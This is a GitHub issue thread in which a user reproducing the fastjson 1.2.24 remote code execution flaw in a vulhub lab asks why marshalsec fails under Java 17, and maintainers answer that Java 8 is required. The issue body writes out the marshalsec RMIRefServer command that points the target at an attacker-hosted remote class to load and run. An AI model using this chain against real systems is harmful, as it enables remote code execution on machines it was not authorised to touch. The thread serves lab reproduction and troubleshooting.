ecki
commented
1 year ago The README clearly states that “Java 8 required” if you want to use newer versions it might not work or you need —add-opens.Gruss Bernd -- http://bernd.eckenfels.net
Closed xiaoqu1 closed 1 year ago
ecki
commented
1 year ago The README clearly states that “Java 8 required” if you want to use newer versions it might not work or you need —add-opens.Gruss Bernd -- http://bernd.eckenfels.net
xiaoqu1
commented
1 year ago Thank you very much for your response. I apologize for not paying enough attention.
mbechler
commented
1 year ago I think none of the relevant classes have been removed (yet), but with Java 17 starting to enforce module access and requiring manual configuration to work around that, sticking to earlier versions is the more sensible option (and with Java > 8, accept the access warnings).
Dear community members,
I am running the Kali subsystem under my Windows system, and executing the following commands:
To reproduce the fastjson 1.2.24 vulnerability, I downloaded marshalsec via sudo git clone https://github.com/mbechler/marshalsec.git.
Next, I installed Maven using sudo apt-get install maven.
Then, I compiled marshalsec using mvn clean package -DskipTests.
I ran the command java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.1.7:8888/#TouchFile 2335, and sent the data packet through bp, after which I received the following output:
The target machine's IP is 192.168.1.8, and the fastjson vulnerability environment is set up using vulhub (https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce).
The IP of the Kali subsystem is 192.168.1.7, and its Java environment version is 17.0.6 2023-01-17:
java --version
openjdk 17.0.6 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)
As I am not very familiar with Java, I am unsure how to correct this error. Any advice or suggestions would be greatly appreciated. Thank you very much for your assistance.